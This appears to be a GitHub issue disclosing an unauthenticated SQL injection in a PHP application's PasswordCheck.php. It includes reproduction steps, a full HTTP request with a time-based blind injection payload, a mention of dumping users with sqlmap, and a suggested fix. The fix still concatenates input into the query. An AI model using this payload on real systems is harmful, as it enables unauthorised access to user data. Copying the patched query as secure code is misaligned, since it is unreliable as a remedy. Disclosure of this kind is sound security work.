Because of lacking of sanitizer of input data at two parameters $_GET['usrid'] and $_GET['prof_id'] in PasswordCheck.php file, The Unauthenticated user can inject sql code and get all informations in database
Use sqlmap tool dump users of database
To Reproduce
SQL INJECTION
Steps to reproduce the behavior:
Acess PasswordCheck.php file
Add ?password=P@a&usrid=[inject sql code in here]&prof_id=[inject sql code in here] behind PasswordCheck.php file
Request
GET /PasswordCheck.php?password=P@a&usrid=1&prof_id=1%27%20AND%20(SELECT%209714%20FROM%20(SELECT(SLEEP(5)))vGYX)--%20- HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=bcq1n5bpstl0b93h22v51uv2sc
Upgrade-Insecure-Requests: 1
use sqlSecurityFilter() function in functions/SqlSecurityFnc.php
include("functions/SqlSecurityFnc.php");
$usrid = sqlSecurityFilter($_GET['usrid']);
$res_pass_chk = DBGet(DBQuery("SELECT * FROM login_authentication WHERE PASSWORD = '".md5($_GET['password'])."' AND USERNAME!='".$usrid."' AND PROFILE_ID!='".intval($_GET['prof_id'])."'"));
The text was updated successfully, but these errors were encountered:
Description:
Because of lacking of sanitizer of input data at two parameters

$_GET['usrid']and$_GET['prof_id']inPasswordCheck.phpfile, The Unauthenticated user can inject sql code and get all informations in databaseUse sqlmap tool dump users of database

To Reproduce
SQL INJECTION
Steps to reproduce the behavior:
PasswordCheck.phpfile?password=P@a&usrid=[inject sql code in here]&prof_id=[inject sql code in here]behindPasswordCheck.phpfileRequest
Response
Solution:
use
sqlSecurityFilter()function infunctions/SqlSecurityFnc.phpThe text was updated successfully, but these errors were encountered: